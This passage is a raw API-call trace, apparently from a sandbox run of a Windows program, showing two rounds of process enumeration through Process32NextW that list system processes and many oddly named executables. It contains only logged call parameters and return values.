dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0143.168] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0143.168] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0143.169] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0143.170] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0143.170] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0143.171] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0143.172] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0143.172] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.173] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.174] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.174] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.175] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0143.176] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.176] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0143.177] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0143.178] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.179] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0143.180] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0143.181] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0143.183] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0143.184] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0143.185] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0143.192] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0143.193] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0143.194] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0143.196] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0143.197] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0143.198] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0143.199] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0143.200] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0143.203] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0143.204] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0143.206] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0143.207] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0143.208] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0143.209] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0143.210] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0143.211] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0143.212] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0143.214] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0143.215] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0143.216] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0143.217] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.218] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0143.219] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0143.220] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0143.221] CloseHandle (hObject=0xbc) returned 1 [0143.221] Sleep (dwMilliseconds=0x12c) [0143.835] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0143.840] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0143.841] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="System")) returned 1 [0143.842] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0143.842] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0143.843] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0143.844] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0143.844] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0143.845] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0143.846] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, 
szExeFile="lsass.exe")) returned 1 [0143.846] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0143.847] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.848] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.848] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.849] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.850] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.851] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="audiodg.exe")) returned 1 [0143.852] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.853] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.853] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0143.854] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.856] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0143.857] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0143.859] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="dwm.exe")) returned 1 [0143.861] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0143.862] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.864] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0143.865] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0143.866] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0143.867] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0143.868] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0143.869] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0143.871] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0143.872] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0143.977] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0143.979] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0143.980] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, 